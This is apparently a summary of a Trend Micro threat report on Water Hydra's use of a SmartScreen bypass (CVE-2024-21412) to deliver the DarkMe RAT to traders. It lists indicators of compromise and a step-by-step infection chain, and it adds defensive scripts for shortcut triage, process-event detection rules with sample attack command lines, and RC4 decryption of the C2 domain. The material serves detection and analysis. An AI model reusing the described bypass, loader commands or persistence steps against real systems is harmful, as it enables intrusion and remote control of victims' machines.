CVE-2024-21412: Water Hydra Targets Traders with Microsoft Defender SmartScreen Zero-Day

Water Hydra exploited a Microsoft Defender SmartScreen bypass (CVE-2024-21412 / ZDI-CAN-23100) to deliver the DarkMe RAT to financial traders by using crafted .url internet shortcuts and WebDAV-hosted artifacts. The chain relied on nested shortcuts, Windows search: protocol and AQS tricks, and icon/filename deception to evade Mark-of-the-Web and SmartScreen protections. #WaterHydra #DarkMe

Keypoints

  • Threat actor Water Hydra used a SmartScreen zero-day (CVE-2024-21412 / ZDI-CAN-23100) to bypass SmartScreen and execute code from WebDAV-hosted resources.
  • Initial access relied on social engineering: spearphishing posts on forex forums and Telegram channels linking to compromised landing pages that pointed to WebDAV shares disguised as JPEG/PDF lures.
  • Attackers abused the Windows search: protocol and Advanced Query Syntax (AQS) to craft an Explorer view and hide the .url extension, plus IconFile/IconIndex to make shortcuts appear as images.
  • Nested internet shortcuts (.url referencing another .url) were used to evade prior SmartScreen patches by preventing proper application of Mark-of-the-Web.
  • Exploitation triggered retrieval of artifacts from a WebDAV server (notably 84.32.189.74), copying 7z binaries and My2.zip to %TEMP%, extracting payloads, and executing a Visual Basic DLL loader via rundll32.
  • The loader (undersets.dll / b3.dll) merged binaries into OnlineProject.dll (DarkMe), imported registry entries via reg.exe to register a COM server, and launched the RAT, which communicates with C2 over a custom TCP protocol.

MITRE Techniques

  • [T1566.002] Phishing: Spearphishing Link – Water Hydra deployed “a spearphishing campaign (T1566.002) on forex trading forums and stock trading Telegram channels to lure potential traders” to deliver malicious links.
  • [T1105] Ingress Tool Transfer – The protections list references “Disallow Download Of Restricted File Formats (ATT&CK T1105)”, reflecting use of WebDAV to copy tools and payloads such as 7z.dll, 7z.exe, and My2.zip from a remote share.
  • [T1574.002] Hijack Execution Flow: DLL Side-Loading/Injection – The protections list includes “Identified Download Of DLL File Over WebDav (ATT&CK T1574.002)”, matching the technique of downloading and executing undersets.dll/b3.dll via rundll32.

Indicators of Compromise

  • [Domain] Malicious landing/WebDAV – fxbulls[.]ru (compromised lure site), 87iavv.com (observed in detection rules)
  • [IP address] WebDAV/C2 host – 84.32.189.74 (used as WebDAV server serving 7z, My2.zip, decoy JPEGs)
  • [File name] Exploit and payload artifacts – photo_2023-12-29.jpg.url (trojan shortcut), My2.zip (payload archive), undersets.dll / b3.dll (loader/downloader)
  • [File hash] DarkMe components – b3.dll MD5 409e7028f820e6854e7197cbb2c45d06 (and SHA-256 bf9c3218f5929dfeccbbdc0ef421282921d6cbc06f270209b9868fc73a080b8c), OnlineProject.dll MD5 93daa51c8af300f9948fe5fd51be3bfb (and SHA-256 d123d92346868aab77ac0fe4f7a1293ebb48cf5af1b01f85ffe7497af5b30738)

In the observed infection flow, Water Hydra lured traders to a compromised landing page that linked to a WebDAV share. The actor used HTML that invoked the Windows search: protocol with crafted AQS queries and the DisplayName element to present a filtered Explorer view; a file named photo_2023-12-29.jpg.url (an INI-style internet shortcut) appeared as a JPEG because Windows hides the .url extension and the shortcut used IconFile/IconIndex to display an image icon. That initial .url pointed to a second .url on a dotted-quad WebDAV server; chaining shortcuts in this way bypassed SmartScreen/Mark-of-the-Web checks (CVE-2024-21412), allowing silent execution without the normal SmartScreen prompt.
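The shortcut traits described above (a double extension that hides .url, a target on a network share, a target that is itself another .url, and a custom IconFile) can be checked mechanically. The following is an added triage script, not code from the Trend Micro write-up; the sample shortcut contents are constructed, 203.0.113.10 is an RFC 5737 documentation address, and the `trader`-style paths and icon index are placeholders.

```python
"""Heuristic triage of Windows internet shortcut (.url) files.

Added example, not code from the Trend Micro write-up. It checks for the
traits attributed to the lure shortcut: a double extension that hides .url
behind an image/document name, a target on a network share (WebDAV/UNC)
rather than a web page, a target that is itself another .url (nested
shortcut), and a custom IconFile. Sample inputs are constructed.
"""
import configparser
import re
from urllib.parse import urlparse

# Filename ends in <document/image extension>.url, e.g. photo.jpg.url
DOUBLE_EXT_RE = re.compile(r"\.(jpe?g|png|gif|bmp|pdf|docx?|xlsx?|txt)\.url$", re.IGNORECASE)
# Raw UNC form (\\host\share or \\host@80\share), or the same with forward slashes
UNC_RE = re.compile(r"^(\\\\|//)[^\\/]+")


def parse_url_shortcut(text: str) -> dict:
    """Return the [InternetShortcut] section as a dict with lower-cased keys."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            return dict(cp.items(section))
    return {}


def is_share_target(url: str) -> bool:
    """True when the target is a network share: a UNC path or file:// with a host."""
    if UNC_RE.match(url):
        return True
    parsed = urlparse(url)
    return parsed.scheme.lower() == "file" and bool(parsed.netloc)


def assess_shortcut(filename: str, text: str) -> list:
    """Return the suspicious traits found (empty list for an ordinary bookmark)."""
    findings = []
    if DOUBLE_EXT_RE.search(filename):
        findings.append("double extension hides .url")
    fields = parse_url_shortcut(text)
    url = fields.get("url", "")
    if url and is_share_target(url):
        findings.append("target is a network share (WebDAV/UNC)")
    if url and url.split("?", 1)[0].lower().endswith(".url"):
        findings.append("target is another .url (nested shortcut)")
    if fields.get("iconfile"):
        findings.append("custom icon via IconFile/IconIndex")
    return findings


# Constructed sample resembling the lure described above (placeholder host,
# placeholder icon index).
LURE_NAME = "photo_2023-12-29.jpg.url"
LURE_TEXT = (
    "[InternetShortcut]\n"
    "URL=file://203.0.113.10/share/2.url\n"
    "IconFile=C:\\Windows\\System32\\shell32.dll\n"
    "IconIndex=3\n"
)

# Constructed ordinary bookmark for comparison.
BENIGN_NAME = "intranet.url"
BENIGN_TEXT = "[InternetShortcut]\nURL=https://intranet.example/\n"

if __name__ == "__main__":
    for name, text in ((LURE_NAME, LURE_TEXT), (BENIGN_NAME, BENIGN_TEXT)):
        print(name, "->", assess_shortcut(name, text) or "no findings")
```

Ordinary bookmarks point at http(s) URLs, so only share-style targets (UNC or file:// with a host) are flagged; an https target that ends in .url still raises the nested-shortcut finding on its own.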

After the SmartScreen bypass, the second shortcut executed a CMD script embedded in a ZIP on the WebDAV share. The script copied 7z.dll and 7z.exe and a My2.zip archive from 84.32.189.74 to %TEMP%, used 7z with a password to extract the archive, then launched a Visual Basic DLL loader (undersets.dll / b3.dll) via rundll32 (rundll32 undersets.dll,RunDllEntryPointW). The loader runs obfuscated, reverse-string commands through cmd.exe to download and prepare payload pieces, then merges two binary parts (a1 + a2) into OnlineProject.dll and imports registry entries (reg.exe import kb.txt) to register the payload as a COM server for persistence and execution (rundll32.exe /sta {GUID}).
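Each step of that post-bypass chain leaves a distinct process-creation event: a CMD script run from a WebDAV UNC path, rundll32 loading a DLL from %TEMP%, reg.exe importing a file from %TEMP%, and rundll32 /sta with a CLSID. The following added example (not code from the write-up or from Trend Micro) expresses those as predicates over a minimal event record and runs them over constructed events; the field names, the `trader` user path, the placeholder host 203.0.113.10 and the null GUID are assumptions.

```python
"""Triage of process-creation events for the post-bypass chain described above.

Added example, not code from the write-up. Each rule is a predicate over a
process event; the sample events are constructed and use placeholder paths,
hosts and a null GUID. The (parent image, image, command line) shape is an
assumption modelled on common Sysmon/EDR telemetry.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# User-writable locations a dropped loader DLL or registry file would live in.
USER_WRITABLE_RE = re.compile(
    r"(?i)(%temp%|\\appdata\\local\\temp\\|\\programdata\\|\\users\\public\\)"
)
# WebDAV mini-redirector UNC forms: \\host@80\share, \\host@SSL\share, \\host\DavWWWRoot\...
WEBDAV_UNC_RE = re.compile(r"(?i)\\\\[^\\\s]+@(80|443|ssl)\\|\\davwwwroot\\")
GUID_RE = re.compile(r"(?i)\{[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\}")


def _base(image: str) -> str:
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def rundll32_user_writable_dll(ev: ProcEvent) -> bool:
    """rundll32 invoking an export from a DLL under a user-writable path."""
    return _base(ev.image) == "rundll32.exe" and bool(USER_WRITABLE_RE.search(ev.command_line))


def rundll32_sta_guid(ev: ProcEvent) -> bool:
    """rundll32 /sta {CLSID}: activation of a registered COM server."""
    cl = ev.command_line.lower()
    return _base(ev.image) == "rundll32.exe" and "/sta" in cl and bool(GUID_RE.search(cl))


def reg_import_user_writable(ev: ProcEvent) -> bool:
    """reg.exe import of a .reg-style file from a user-writable path."""
    cl = ev.command_line.lower()
    return _base(ev.image) == "reg.exe" and " import " in cl and bool(USER_WRITABLE_RE.search(cl))


def cmd_from_webdav(ev: ProcEvent) -> bool:
    """cmd.exe whose command line references a WebDAV UNC path."""
    return _base(ev.image) == "cmd.exe" and bool(WEBDAV_UNC_RE.search(ev.command_line))


RULES = [
    ("rundll32_user_writable_dll", rundll32_user_writable_dll),
    ("rundll32_sta_guid", rundll32_sta_guid),
    ("reg_import_user_writable", reg_import_user_writable),
    ("cmd_from_webdav", cmd_from_webdav),
]


def triage(events):
    """Return, per event and in input order, the list of rule names that matched."""
    return [[name for name, pred in RULES if pred(ev)] for ev in events]


# Constructed events mirroring the chain (WebDAV-hosted CMD script, loader DLL
# from %TEMP%, registry import, COM activation) plus one benign rundll32 call.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "C:\\Windows\\System32\\cmd.exe",
              "cmd.exe /c \\\\203.0.113.10@80\\share\\run.cmd"),
    ProcEvent("cmd.exe", "C:\\Windows\\System32\\rundll32.exe",
              "rundll32 C:\\Users\\trader\\AppData\\Local\\Temp\\undersets.dll,RunDllEntryPointW"),
    ProcEvent("rundll32.exe", "C:\\Windows\\System32\\reg.exe",
              "reg.exe import C:\\Users\\trader\\AppData\\Local\\Temp\\kb.txt"),
    ProcEvent("rundll32.exe", "C:\\Windows\\System32\\rundll32.exe",
              "rundll32.exe /sta {00000000-0000-0000-0000-000000000000}"),
    ProcEvent("explorer.exe", "C:\\Windows\\System32\\rundll32.exe",
              "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"{ev.command_line[:60]:60} -> {hits or 'clean'}")
```

Each rule fires on its own; correlating them by parent/child relationship within a short window (cmd.exe from a WebDAV path spawning rundll32, which spawns reg.exe) raises confidence well above any single hit.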

The final stage is the DarkMe RAT (OnlineProject.dll), a VB6-compiled DLL that registers with its C2 using an RC4-encrypted domain (decrypted with the hardcoded key “noway123!$$#@35@!”), opens a TCP listener, and sends a structured registration packet (locale, computer/user name, antivirus list, foreground window title) followed by periodic heartbeat messages (Timer3 interval ~5555 ms). DarkMe implements socket communication via a hidden window (SOCKET_WINDOW) and supports remote commands for file enumeration, shell execution, zipping, and other remote operations, enabling full post-exploitation control once the initial WebDAV/shortcut exploit chain completes.
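An analyst recovering the C2 domain from a DarkMe sample needs nothing more than RC4 with the hardcoded key quoted above. The following added example (not code from the write-up) implements RC4 (KSA + PRGA) and applies that key; because the write-up does not reproduce the actual ciphertext, the encrypted sample is constructed here by encrypting a placeholder domain with the same key, and `decrypt_c2_domain` is an assumed helper name.

```python
"""RC4 helper for recovering the DarkMe C2 domain from its encrypted form.

Added example, not code from the write-up. The key is the hardcoded value
reported for DarkMe; the encrypted sample is constructed by encrypting a
placeholder domain with that key. The RC4 routine is the standard KSA + PRGA.
"""
import binascii

DARKME_RC4_KEY = b"noway123!$$#@35@!"  # hardcoded key reported in the write-up


def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt `data` with RC4 (the same operation both ways)."""
    # Key-scheduling algorithm (KSA): permute the 256-byte state with the key
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation algorithm (PRGA): XOR each byte with keystream
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_c2_domain(blob_hex: str, key: bytes = DARKME_RC4_KEY) -> str:
    """Decrypt a hex-encoded RC4 blob (as carved from a sample) and return text."""
    return rc4(key, binascii.unhexlify(blob_hex)).decode("ascii")


# Constructed: a placeholder domain encrypted with the reported key, standing
# in for the blob an analyst would carve out of OnlineProject.dll.
PLACEHOLDER_DOMAIN = "c2.example.invalid"
SAMPLE_BLOB_HEX = rc4(DARKME_RC4_KEY, PLACEHOLDER_DOMAIN.encode()).hex()

if __name__ == "__main__":
    print("encrypted:", SAMPLE_BLOB_HEX)
    print("decrypted:", decrypt_c2_domain(SAMPLE_BLOB_HEX))
```

Because RC4 is a stream cipher with no integrity check, a wrong key yields plausible-looking garbage rather than an error; sanity-check the output against the expected hostname syntax before treating it as an indicator.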

Read more: https://www.trendmicro.com/en_us/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-smartscreen-zero-day/water-hydra-targets-traders-with-windows-defender-smartscreen-zero-day.s.html